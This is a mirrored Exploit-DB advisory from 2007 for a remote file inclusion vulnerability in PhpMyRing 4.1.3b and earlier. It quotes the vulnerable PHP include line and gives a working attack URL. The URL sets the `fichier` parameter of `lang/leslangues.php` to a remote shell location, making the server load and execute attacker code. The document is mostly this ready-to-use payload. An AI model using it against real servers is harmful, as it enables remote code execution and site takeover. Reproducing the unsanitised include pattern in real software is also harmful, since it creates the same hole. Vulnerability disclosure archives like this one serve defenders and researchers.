exploit-db-mirror/exploits/php/webapps/3238.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
662 B
Text

*******************************************************************************
# Title : PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.microniko.net/phpmyring/
# $$ : Free
*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include ($fichier.".php");
?>
..
...
.....
[[ERROR]]]
[[RFI]]]
http://[target]/[path]//lang/leslangues.php?fichier=[SHELL]
Example:
//lang/leslangues.php?fichier=http://[target]/[path]/shell.x
[[/RFI]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-31]